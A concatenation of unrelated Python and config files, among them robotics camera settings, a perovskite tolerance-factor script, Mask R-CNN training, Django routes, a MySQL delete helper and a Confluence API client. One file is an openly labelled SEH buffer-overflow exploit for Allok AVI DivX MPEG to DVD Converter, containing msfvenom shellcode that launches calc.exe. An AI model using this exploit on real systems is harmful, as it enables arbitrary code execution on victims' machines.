MARCO_GO_RIGHT_ID = 542918673
MARCO_GO_RIGHT_INTERVAL = 480
#############################
## 相机参数
##
#############################
# 摄像头的设备号
CAM_PORT_NAME = '/dev/video0'
# 画面宽度
CAM_IMG_WIDTH = 680
# 画面高度
CAM_IMG_HEIGHT = 480
# 亮度
CAM_BRIGHNESS = 4
# 对比度
CAM_CONTRUST = 44
# 色调
CAM_HUE = 322
# 饱和度
CAM_SATURATION = 43
# 锐度
CAM_SHARPNESS = 45
# GAMMA
CAM_GAMMA = 150
# 开启自动白平衡
CAM_AWB = True
# 白平衡的温度
CAM_WHITE_BALANCE_TEMPRATURE = 4600
# 自动曝光
CAM_EXPOSURE_AUTO = True
# 相对曝光
CAM_EXPOSURE_ABSOLUTE = 78
# 相机帧率
CAM_FPS = 30
#############################
## 相机安装位置相关机械参数
##
#############################
# 相机相对地面安装的高度 (单位:cm)
# 固定在头部是37cm 固定在胸部是29cm
CAM_H = 29 # 37
# 相机的俯仰角 (单位:度)
# 相机光心与水平面的夹角
CAM_PITCH = 60
#############################
## 直线的类型
## 1: 单轨 3: 三轨
#############################
LINE_TYPE = 1
|
# coding: utf-8
# In[2]:
# A script to calculate tolerance factors of ABX3 perovskites using bond valences from 2016
# Data from the International Union of Crystallography
# Author: Nick Wagner
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pymatgen as mg
from pymatgen.analysis.bond_valence import calculate_bv_sum, calculate_bv_sum_unordered, BVAnalyzer
# In[ ]:
bv = pd.read_csv("../data/Bond_valences2016.csv")
bv.head()
# In[3]:
# Use element names and valences to lookup bond valence
def get_bv_params(cation, anion, cat_val, an_val):
bond_val_list = bv[(bv['Atom1'] == cation) & (bv['Atom1_valence'] == cat_val) & (bv['Atom2'] == anion) & (bv['Atom2_valence'] == an_val)]
return bond_val_list.iloc[0] # If multiple values exist, take first one
# In[4]:
# A function to calculate a generalized Goldschmidt tolerance factor for perovskites and RP phases
def calc_tol_factor(ion_list, valence_list, rp=0):
if len(ion_list) > 4 or len(ion_list) < 3:
print("Error: there should be three or four elements")
return None
if len(ion_list) < 4:
for i in range(len(valence_list)): # If charge is 2-, make -2 to match tables
if valence_list[i][-1] == '-':
valence_list[i] = valence_list[i][-1] + valence_list[i][:-1]
for i in range(len(valence_list)): # Similarly, change 2+ to 2
valence_list[i] = int(valence_list[i].strip("+"))
if len(ion_list) == 4:
# print("RED ALERT: We are taking averages of bond valence parameters")
AO_value1 = get_bv_params(ion_list[0], ion_list[-1], valence_list[0], valence_list[-1])
AO_value2 = get_bv_params(ion_list[1], ion_list[-1], valence_list[1], valence_list[-1])
AO_values = np.concatenate([AO_value1.values.reshape(1, len(AO_value1)),
AO_value2.values.reshape(1, len(AO_value2))])
AO_B = np.average(AO_values[:, 4])
AO_Ro = np.average(AO_values[:, 5])
AO_valence = np.average(AO_values[:, 1]) # RED ALERT: We are taking averages of bond valence parameters
else:
AO_row = get_bv_params(ion_list[0], ion_list[-1], valence_list[0], valence_list[-1])
BO_row = get_bv_params(ion_list[-2], ion_list[-1], valence_list[-2], valence_list[-1])
if len(ion_list) != 4:
if rp == 0:
AO_bv = AO_row['Ro']-AO_row['B'] * np.log(AO_row['Atom1_valence']/12)
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
else: # Currently for Ruddlesden-Popper phases a naive weighted sum is used between A-site coordination of
# 9 in the rocksalt layer and 12 in perovskite
AO_bv = AO_row['Ro']-AO_row['B'] * np.log(AO_row['Atom1_valence']/((9+12*(rp-1))/rp))
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
else:
if rp == 0:
AO_bv = AO_Ro-AO_B * np.log(AO_valence/12)
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
else: # Currently for Ruddlesden-Popper phases a naive weighted sum is used between A-site coordination of
# 9 in the rocksalt layer and 12 in perovskite
AO_bv = AO_Ro-AO_B * np.log(AO_valence/((9+12*(rp-1))/rp))
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
tol_fact = AO_bv / (2**0.5 * BO_bv)
return tol_fact
# In[ ]:
# Test using BaMnO3
# Should return 1.09630165911 for perovskite and 1.07615743313 for rp=2
print(calc_tol_factor(['Ba', 'Mn','O'], ['2+', '4+', '2-']))
print(calc_tol_factor(['Ba', 'Mn','O'], ['2+', '4+', '2-'], rp=2))
# In[5]:
def isanion(atom, anions=['O', 'S', 'F', 'Cl']):
#print "in isanion fun... atom is {} and anions are {}".format(atom, anions)
check = atom in anions
return check
def iscation(atom, cations):
check = atom not in ['O', 'S', 'F', 'Cl']
return check
def MObonds_greedy(structure,Msite, cutoff=3.0):
# This function takes a pymatgen structure and perovskite Bsite and returns a list of the bond lengths associated with the Msite/anion bond lengths for the first site
bond_lengths = []
# determine Bsite and oxygen indexes
for site in structure.sites:
if Msite in str(site):
neighbors = structure.get_neighbors(site, r = cutoff, include_index=True)
for neighbor in neighbors:
elems_on_neighsite = structure.species_and_occu[neighbor[2]].elements
symbols = [elem.symbol for elem in elems_on_neighsite]
if Msite in symbols:
continue
else:
bond_lengths.append(neighbor[1])
if not bond_lengths:
neighbors = structure.get_neighbors(site, r = cutoff+0.6, include_index=True)
for neighbor in neighbors:
elems_on_neighsite = structure.species_and_occu[neighbor[2]].elements
symbols = [elem.symbol for elem in elems_on_neighsite]
if Msite in symbols:
continue
else:
bond_lengths.append(neighbor[1])
return bond_lengths
else:
return bond_lengths
return bond_lengths
# Computes GII using a automatic cutoff determining scheme. The cutoff is intended to be the longest nearest-neighbor bond length
def gii_compute(struct, name):
el = struct.species_and_occu[0].elements[0].symbol
max_MObond = np.max(MObonds_greedy(struct, el))
cutoff = max_MObond
# for loop to calculate the BV sum on each atom
BVpara = pd.read_csv("../data/Bond_valences2016.csv")
bv = BVAnalyzer(max_radius=cutoff+0.1)
bv_diffs = []
for atom_indx, site in enumerate(struct.sites):
neighbors = struct.get_neighbors(site, cutoff)
try:
bv_sum = calculate_bv_sum_unordered(site, neighbors)
except:
bv_sum = calculate_bv_sum(site, neighbors)
try:
formal_val = bv.get_valences(struct)[atom_indx]
except:
print('Difficulty obtaining site valences. Returning None')
return None
bv_diffs.append(np.power(np.subtract(bv_sum, formal_val),2))
GII_val = np.sqrt(np.sum(bv_diffs)/struct.composition.num_atoms)
return GII_val
# In[6]:
# Calculate GII for all compounds in your dataset
# Requires one column with elements (e.g. Ba_Ti_O),
# one column with the structure path (e.g. ./Structures/BaTiO3.cif),
# and one column with the formal valences (e.g. 2_4_-2).
# Does not work with disordered compounds due to a Pymatgen limitation
# Output saved to GII_temp.csv in current folder.
# Ideally GII values should be close to 0 and less than 0.2, but good luck
try:
df = pd.read_excel("../data/Dataset.xlsx",sheetname="Combined_MIT+nonMIT")
except:
print("Define df to be your dataset path in the code!")
gii_values = []
for i in df.index:
struct = mg.Structure.from_file('..' + df.loc[i, "struct_file_path"])
name=df.loc[i,'Compound']
gii = gii_compute(struct, name)
gii_values.append(gii)
foo = pd.DataFrame(gii_values)
foo.to_csv("../data/GII_temp.csv")
|
import os
import sys
from numpy import random
import math
import re
import time
import numpy as np
import cv2
import matplotlib
import matplotlib.pyplot as plt
import json
from PIL import Image, ImageDraw
from tensorflow.python.framework.versions import VERSION as __version__
import tensorflow as tf
from imgaug import augmenters as iaa
import warnings
warnings.filterwarnings(action='ignore')
#Cambiamos el Directorio al propio de MASK_RCNN
ROOT_DIR = 'D:/Cleansea/Mask_RCNN-cleansea'
#ROOT_DIR = '/home/saflex/projecto_cleansea/Mask_RCNN/Mask_RCNN-master'
assert os.path.exists(ROOT_DIR), 'ROOT_DIR does not exist'
# Import mrcnn libraries
sys.path.append(ROOT_DIR)
from mrcnn.config import Config
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
from mrcnn.model import log
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# Directorio perteneciente a MASK-RCNN
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Ruta al archivo de pesos
COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Descargamos los Pesos Entrenados de COCO
if not os.path.exists(COCO_WEIGHTS_PATH):
utils.download_trained_weights(COCO_WEIGHTS_PATH)
############################################################
# Configuracion
############################################################
class CleanSeaConfig(Config):
"""
Configuracion para el entrenamiento con CleanSea Dataset.
"""
# Nombre de la configuracion
NAME = "debris"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 1
# Use small images for faster training. Set the limits of the small side
# the large side, and that determines the image shape.
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
# Numero de clases + el background
NUM_CLASSES = 1 + 19 # Cleansea tiene 19 clases
# Salta las detecciones con <50% de seguridad
DETECTION_MIN_CONFIDENCE = 0.5
#Learning Rate Modificado
LEARNING_RATE = 0.001
config= CleanSeaConfig()
config.display()
def get_ax(rows=1, cols=1, size=8):
"""Return a Matplotlib Axes array to be used in
all visualizations in the notebook. Provide a
central point to control graph sizes.
Change the default size attribute to control the size
of rendered images
"""
_, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))
return ax
############################################################
# Dataset
############################################################
class CleanSeaDataset(utils.Dataset):
def load_data(self, dataset_dir, subset):
# Train or validation dataset?
assert subset in ["train_coco", "test_coco"]
dataset_dir = os.path.join(dataset_dir, subset)
print(dataset_dir)
# Cargamos el archivo json
annotation_json = os.path.join(dataset_dir,"annotations.json")
json_file = open(annotation_json)
coco_json = json.load(json_file)
json_file.close()
print("\nAnotaciones Cargadas\n")
# Añadimos los nombres de las clases usando el metodo de utils.Dataset
source_name = "coco_like"
for category in coco_json['categories']:
class_id = category['id']
class_name = category['name']
if class_id < 1:
print('Error: Class id for "{}" reserved for the background'.format(class_name))
else:
self.add_class(source_name, class_id, class_name)
print("Nombres Añadidos \n")
# Almacenamos las anotaciones
annotations = {}
for annotation in coco_json['annotations']:
image_id = annotation['image_id']
if image_id not in annotations:
annotations[image_id] = []
annotations[image_id].append(annotation)
print("Anotaciones Almacenadas\n")
# Almacenamos las imagenes y las añadimos al dataset
seen_images = {}
for image in coco_json['images']:
image_id = image['id']
if image_id in seen_images:
print("Warning: Skipping duplicate image id: {}".format(image))
else:
seen_images[image_id] = image
try:
image_file_name = image['file_name']
image_width = image['width']
image_height = image['height']
except KeyError as key:
print("Warning: Skipping image (id: {}) with missing key: {}".format(image_id, key))
image_path = os.path.join(dataset_dir, image_file_name)
image_annotations = annotations[image_id]
# Añadimos la imagen usando el metodo de utils.Dataset
self.add_image(
source=source_name,
image_id=image_id,
path=image_path,
width=image_width,
height=image_height,
annotations=image_annotations
)
print("Imagenes añadidas al Dataset\n")
def load_mask(self, image_id):
""" Carga la mascara de instancia para la imagen dada
MaskRCNN espera mascaras en forma de mapa de bits (altura, anchura e instancias)
Argumentos:
image_id: El ID de la imagen a la que vamos a cargar la mascara
Salida:
masks: Una cadena booleana con estructura (altura, anchya y la cuenta de instancias) con una mascara por instancia
class_ids: Una cadena de 1 dimension de clase ID de la instancia de la mascara """
image_info = self.image_info[image_id]
annotations = image_info['annotations']
instance_masks = []
class_ids = []
for annotation in annotations:
class_id = annotation['category_id']
mask = Image.new('1', (image_info['width'], image_info['height']))
mask_draw = ImageDraw.ImageDraw(mask, '1')
for segmentation in annotation['segmentation']:
mask_draw.polygon(segmentation, fill=1)
bool_array = np.array(mask) > 0
instance_masks.append(bool_array)
class_ids.append(class_id)
mask = np.dstack(instance_masks)
class_ids = np.array(class_ids, dtype=np.int32)
return mask, class_ids
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "object":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
"""Train the model."""
# Training dataset.
dataset_train = CleanSeaDataset()
print("Configuracion para train cargada\n")
dataset_train.load_data("D:/Cleansea/cleansea_dataset/CocoFormatDataset","train_coco")
print("Dataset Inicializado Correctamente\n")
dataset_train.prepare()
print("Preparacion del Dataset Completada\n")
# Validation dataset
dataset_test = CleanSeaDataset()
print("Configuracion para test cargada\n")
dataset_test.load_data("D:/Cleansea/cleansea_dataset/CocoFormatDataset", "test_coco")
print("Dataset Inicializado Correctamente\n")
dataset_test.prepare()
print("Preparacion del Dataset Completada\n")
# Load and display random samples
print("Mostrando Imagenes aleatorias...\n")
image_ids = np.random.choice(dataset_train.image_ids, 4)
for image_id in image_ids:
image = dataset_train.load_image(image_id)
mask, class_ids = dataset_train.load_mask(image_id)
visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)
print("Inicializing model for training...\n")
model=modellib.MaskRCNN(mode="training", config=config, model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "coco" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_WEIGHTS_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last(), by_name=True)
last_path="D:/Cleansea/Mask_RCNN-cleansea/logs/mask_rcnn_debris_weights1000DA5Heads.h5"
model.load_weights(last_path, by_name=True)
############################################################
# Training
############################################################
# ===============================================================================
# Aumentado de Datos
# ===============================================================================
seq = iaa.Sequential([
iaa.Fliplr(0.5), # horizontal flips
# Small gaussian blur with random sigma between 0 and 0.5.
# But we only blur about 50% of all images.
iaa.Sometimes(
0.5,
iaa.GaussianBlur(sigma=(0, 0.5))
),
# Strengthen or weaken the contrast in each image.
iaa.LinearContrast((0.75, 1.5)),
# Make some images brighter and some darker.
# In 20% of all cases, we sample the multiplier once per channel,
# which can end up changing the color of the images.
iaa.Multiply((0.8, 1.2), per_channel=0.2),
# Apply affine transformations to each image.
# Scale/zoom them, translate/move them, rotate them and shear them.
iaa.Affine(
scale={"x": (0.8, 1.2), "y": (0.8, 1.2)},
translate_percent={"x": (-0.2, 0.2), "y": (-0.2, 0.2)},
rotate=(-25, 25),
shear=(-8, 8)
)
], random_order=True) # apply augmenters in random order
"""
seq = iaa.Sequential([
iaa.Fliplr(0.5), # horizontal flips
])
"""
# ===============================================================================
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
print("Entrenando Heads...\n")
model.train(dataset_train, dataset_test, learning_rate=config.LEARNING_RATE, epochs=5, layers='heads',augmentation=seq)
# Fine tune all layers
# Passing layers="all" trains all layers. You can also
# pass a regular expression to select which layers to
# train by name pattern.
print("Entrenando extensivamente...\n")
model.train(dataset_train, dataset_test,
learning_rate=config.LEARNING_RATE / 10,
epochs=1000,
layers="all",augmentation=seq)
# Save weights
# Typically not needed because callbacks save after every epoch
# Uncomment to save manually
print("Guardando Pesos...\n")
model_path = os.path.join(MODEL_DIR, "mask_rcnn_debris_weights.h5")
model.keras_model.save_weights(model_path)
print("Pesos Guardados en mask_rcnn_debris_weights.h5")
############################################################
# Evaluacion
############################################################
class InferenceConfig(CleanSeaConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
USE_MINI_MASK = False
inference_config = InferenceConfig()
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
# Get path to saved weights
# Either set a specific path or find last trained weights
# model_path = os.path.join(ROOT_DIR, ".h5 file name here")
model_path = model.find_last()
# Load trained weights
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
image_ids = dataset_test.image_ids
APs = []
for image_id in image_ids:
# Load image and ground truth data
image, image_meta, gt_class_id, gt_bbox, gt_mask =\
modellib.load_image_gt(dataset_test, inference_config,
image_id)
molded_images = np.expand_dims(modellib.mold_image(image, inference_config), 0)
# Run object detection
results = model.detect([image], verbose=0)
r = results[0]
# Compute AP
AP, precisions, recalls, overlaps =\
utils.compute_ap(gt_bbox, gt_class_id, gt_mask,
r["rois"], r["class_ids"], r["scores"], r['masks'])
APs.append(AP)
print("mAP: ", np.mean(APs))
|
from uuid import uuid4
class AbstractStorage(object):
def __init__(self, manager, **config):
self.manager = manager
self.init(**config)
def begin(self):
transaction = uuid4().hex
self.initialize_transaction(transaction)
return transaction
def initialize_transaction(self, transaction_id):
raise NotImplementedError
def add_operation(self, transaction_id, operation, rollback):
raise NotImplementedError
def get(self, transaction_id):
"""This method should return transaction object"""
raise NotImplementedError
def remove_transaction(self, transaction_id):
raise NotImplementedError
def mark_transaction_succesfull(transaction_id, n):
"""This method must set the operation state as done"""
raise NotImplementedError
def mark_operation_failed(self, transaction_id, operation):
raise NotImplementedError
def mark_operation_success(self, transaction_id, operation):
raise NotImplementedError
|
from motion_detector import df
from bokeh.plotting import figure, show, output_file
from bokeh.models import HoverTool, ColumnDataSource
df["Start_string"]=df["Start"].dt.strftime("%Y-%m-%d %H:%M:%S")
df["End_string"]=df["End"].dt.strftime("%Y-%m-%d %H:%M:%S")
plot=figure(x_axis_type='datetime',height=200, width=1000,title="Motion Graph")
plot.ygrid[0].ticker.desired_num_ticks=1
# add hover timestamp info
hover=HoverTool(tooltips=[("Start","@Start_string"),("End","@End_string")])
plot.add_tools(hover)
cds=ColumnDataSource(df)
quad=plot.quad(left="Start",right="End",bottom=0,top=1,color="green",source=cds)
# specify output template
output_file("Graph.html")
# export obtained dataframe to csv
df.to_csv("../timestamps.csv")
# open plot using default browser
show(plot)
|
import rospy
import os
from sensor_msgs.msg import CameraInfo, Image
__all__ = ('ImagePublisher')
class ImagePublisher:
"""Wrapper to publish images to a topic."""
def __init__(self, topic, frame_id, camera_info, queue_size=None):
"""[summary]
Arguments:
topic {str} -- image topic
frame_id {str} -- camera frame_id
camera_info (CameraInfo) -- camera info
Keyword Arguments:
queue_size {int} -- The queue size used for asynchronously (default: {None})
"""
self._topic = topic
self._frame_id = frame_id
self._camera_info = camera_info
self._image_pub = rospy.Publisher(
topic + '/image', Image, queue_size=queue_size)
self._camera_info_pub = rospy.Publisher(
topic + '/camera_info', CameraInfo, queue_size=queue_size)
def publish(self, image, encoding='passthrough'):
"""Publish image.
Arguments:
image {numpy.ndarray} -- image data
Keyword Arguments:
encoding {str} -- desired encoding (default: {'passthrough'})
"""
msg = _array_to_imgmsg(image, encoding)
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = self._frame_id
self._image_pub.publish(msg)
self._camera_info_pub.publish(self._camera_info)
def get_num_connections(self):
"""Get the number of connections to other ROS nodes for this topic.
Returns:
int -- number of connections
"""
return self._image_pub.get_num_connections()
def _array_to_imgmsg(img_array, encoding):
assert len(img_array.shape) == 3
img_msg = Image()
img_msg.height = img_array.shape[0]
img_msg.width = img_array.shape[1]
if encoding == 'passthrough':
img_msg.encoding = '8UC3'
else:
img_msg.encoding = encoding
if img_array.dtype.byteorder == '>':
img_msg.is_bigendian = True
img_msg.data = img_array.tostring()
img_msg.step = len(img_msg.data) // img_msg.height
return img_msg
|
import sys
sys.path.append('../')
import config as cf
from word_feature.utils import get_unique_word, read_caption_clean_file, map_w2id
import numpy as np
def load_glove(path):
"""
Give you the dict of word and its coefficent
"""
f = open(path, encoding='utf-8')
print("Loading the /{}/ vector".format(path.split('/')[-1]))
embeddings_index = {}
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
return embeddings_index
def make_word_matrix(str_list, glove_path = 'database/glove.6B.200d.txt'):
# FIXME
"""
Give you word customized matrix
"""
idxtoword, wordtoidx, vocab_size = map_w2id(str_list)
embeddings_index = load_glove(glove_path)
embedding_matrix = np.zeros((vocab_size, cf.embedding_dim))
for word, i in wordtoidx.items():
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
# Words not found in the embedding index will be all zeros
embedding_matrix[i] = embedding_vector
# Find what to return #
return embedding_matrix
|
"""instagram URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url,include
from users import views as user_views
from django.contrib.auth import views
urlpatterns = [
url('admin/', admin.site.urls),
url(r'',include('feed.urls')),
url(r'^accounts/register',user_views.register_user,name='register_user' ),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
url(r'^users/not-following/$',user_views.not_following,name='not_following'),
url(r'^users/add/following/(\d+)$',user_views.add_following,name='add_following'),
url(r'^users/remove/following/(\d+)$',user_views.remove_following,name='remove_following'),
url(r'^users/my-profile/$',user_views.my_profile,name='my_profile'),
url(r'^users/edit_profile/$',user_views.edit_profile, name ='edit_profile'),
url(r'users/search/', user_views.search_users, name='search_users'),
]
|
from django import forms
from .models import Procedure,Profile
class ProcedureForm(forms.ModelForm):
class Meta:
model = Procedure
exclude = ['user','user_procedure_id']
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
exclude = ['prof_user','profile_Id']
class VoteForm(forms.ModelForm):
class Meta:
model = Procedure
fields = ('process','steps')
|
#!/usr/bin/evn python
import threading
from scapy.all import *
import subprocess as sp
import Queue
import time
class Sniffer(threading.Thread):
def __init__(self, queue, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
self.__queue = queue
sp.Popen(['hostapd', '/etc/hostapd/hostapd.conf'])
def run(self):
def record(packet, ignore = set()):
self.__queue.put(("WiFi", packet.src, time.time()))
sniff(prn=record)
|
# ------------------------------------------------------------------------------
# Created by Tyler Stegmaier
# Copyright (c) 2020.
#
# ------------------------------------------------------------------------------
from typing import List, Tuple
from ..Widgets.base import *
__all__ = ['Style']
class Style(ttk.Style):
def Configure_Root(self, background: str, foreground: str, selected: str, active: str, font: str):
self.configure('.', background=background, foreground=foreground, font=font)
self.map('.', background=[('selected', selected), ('active', active)])
def Configure_NotebookTab(self, background: str, foreground: str, selected: str, active: str, font: str, padding: Tuple[int, int]):
self.configure('TNotebook.Tab', background=background, foreground=foreground)
self.map('TNotebook.Tab', background=[('selected', selected), ('active', active)])
self.theme_settings(self.CurrentTheme, { "TNotebook.Tab": { "configure": { "padding": padding, 'font': font } } })
@property
def Themes(self) -> List[str]: return self.theme_names()
@property
def CurrentTheme(self): return self.theme_use()
@CurrentTheme.setter
def CurrentTheme(self, theme: str): self.theme_use(theme)
|
import sys
import pytest
if __name__ == "__main__":
repeat_times = 3
for index, arg in enumerate(sys.argv):
if arg == '-n':
repeat_times = int(sys.argv[index + 1])
pytest.main(['--repeat-count=%s' % repeat_times, 'test_hilauncher_gfx.py'])
|
#!/usr/bin/env python
#
# Exploit Title : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)
# Date : 3/27/18
# Exploit Author : wetw0rk
# Vulnerable Software : Allok AVI DivX MPEG to DVD Converter
# Vendor Homepage : http://alloksoft.com/
# Version : 2.6.1217
# Software Link : http://alloksoft.com/allok_avimpeg2dvd.exe
# Tested On : Windows 10 , Windows 7 (x86-64)
#
# Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17
#
# Trigger the vulnerability by:
# Copy text file contents -> paste into "License Name" -> calc
#
shellcode = "\x90" * 20 # nop sled
shellcode += ( # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c
"\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8"
"\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4"
"\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5"
"\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4"
"\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89"
"\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35"
"\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f"
"\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f"
"\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf"
"\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a"
"\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4"
"\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17"
"\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f"
"\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b"
)
offset = "A" * 780
nSEH = "\x90\x90\xeb\x06" # jmp +0x06
SEH = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll]
trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!)
offset +
nSEH +
SEH +
shellcode
)
)
payload = offset + nSEH + SEH + shellcode + trigger
fd = open("pasteME.txt", "w")
fd.write(payload)
fd.close()
|
from API_operaciones.mysql_connection import app
from API_operaciones.mysql_connection import mysql2 as mysql
from API_operaciones.bd_descripcion import pimcBD
import MySQLdb
def eliminarElemento(elementoRelacional, parametrosJSON):
cur = mysql.cursor()
if (not pimcBD.tablaExiste(elementoRelacional)):
raise ValueError("elementoRelacional No Existe")
return None
if (not isinstance(parametrosJSON, dict)):
raise ValueError("parametrosJSON no es dictionario")
return None
if (parametrosJSON == {}):
raise ValueError("parametrosJSON vacios")
return None
idElementoRelacional = pimcBD.obtenerTablaId(elementoRelacional)
if idElementoRelacional:
if idElementoRelacional in parametrosJSON:
idValor = parametrosJSON[idElementoRelacional]
# Inicializamos la consulta
query = '''DELETE FROM %s WHERE %s = %d '''
try:
numEntradasBorradas = cur.execute(query % (elementoRelacional, idElementoRelacional, int(idValor)))
mysql.commit()
return numEntradasBorradas
except (MySQLdb.Error, MySQLdb.Warning) as e:
raise ValueError("MYSQL ERROR = ", str(e))
return None
else:
raise ValueError("ID Invalido para elemento relacional")
return None
else:
raise ValueError("ID invalido para elemento relacional")
return None
|
import json
import logging
import re
import unicodedata
import backoff
import dateutil.parser
from bs4 import BeautifulSoup, NavigableString
from urllib import request, parse, error
logger = logging.getLogger(__name__)
class ConfluenceAPI(object):
"""Confluence API Class
This class acts as an API bridge between python and the confluence API.
"""
empty_contents = ['', ',', '.', ' ']
host = None
__username = None
__password = None
@classmethod
def setup(cls, config):
cls.host = config['confluence']['host']
cls.__username = config['confluence']['username']
cls.__password = config['confluence']['password']
@classmethod
@backoff.on_exception(backoff.expo, (error.URLError, error.ContentTooShortError, ConnectionResetError, ConnectionRefusedError, ConnectionAbortedError, ConnectionError), max_tries=8)
def __make_rest_request(cls, api_endpoint, content_id, url_params):
"""Low level request abstraction method.
This method will make a request to the Confluence API and return the response directly to the caller.
Args:
api_endpoint (str): The endpoint on the rest api to call.
content_id (str): The id of the content to retrieve.
url_params (dict): A dictionary of url params.
Returns:
dict: Returns the response from the server.
"""
params = parse.urlencode(
{**url_params, 'os_username': cls.__username, 'os_password': cls.__password})
url = cls.host + '/rest/api/' + api_endpoint + '/' + content_id + '?%s' % params
logger.debug('make_rest_request: URL requested : %s' % url)
try:
return json.loads(unicodedata.normalize("NFKD", request.urlopen(url).read().decode('utf-8')))
except error.HTTPError as e:
logger.error(e)
return e
except:
logger.error(
"__make_rest_request: Error making request with id: %s" % content_id)
return
@classmethod
@backoff.on_exception(backoff.expo, (error.URLError, error.ContentTooShortError, ConnectionResetError, ConnectionRefusedError, ConnectionAbortedError, ConnectionError), max_tries=8)
def __make_master_detail_request(cls, url_params):
"""Low level request abstraction method.
This method will make a request to the Confluence API master details page and return the response directly to
the caller.
Args:
url_params (dict): A dictionary of url params.
Returns:
dict: Returns the response from the server.
"""
params = parse.urlencode(
{**url_params, 'os_username': cls.__username, 'os_password': cls.__password})
url = cls.host + '/rest/masterdetail/1.0/detailssummary/lines' + '?%s' % params
logger.debug('make_master_detail_request: URL requested: %s' % url)
try:
return json.loads(unicodedata.normalize("NFKD", request.urlopen(url).read().decode('utf-8')))
except error.HTTPError as e:
return e
except:
logger.error(
"__make_master_detail_request: Error retrieving master details.")
@classmethod
def __extract_heading_information(cls, content, heading):
"""Extracts all information beneath a heading.
This method extracts all information beneath a heading.
Args:
content (str): The content to extract the text from.
heading (str): The heading to extract the information below.
Returns:
dict: The extracted text in the heading.
"""
logger.debug(
'extract_heading_information: Heading to extract information from: %s' % heading)
html = BeautifulSoup(content, 'html.parser')
heading_container = ''
try:
heading_container = str(
html.find(string=heading).parent.next_sibling)
except:
logger.warning(
'__extract_heading_information: The following heading does not exists for the content provided: %s' % heading)
return ConfluenceAPI.__handle_html_information(heading_container, heading)
@classmethod
def __extract_page_information(cls, content, page):
"""Extracts all information from a page.
This method extracts all the text information from a page.
Args:
content (str): The content to extract the text from.
page (str): The title of the page that the information was taken from.
Returns:
dict: The extracted text.
"""
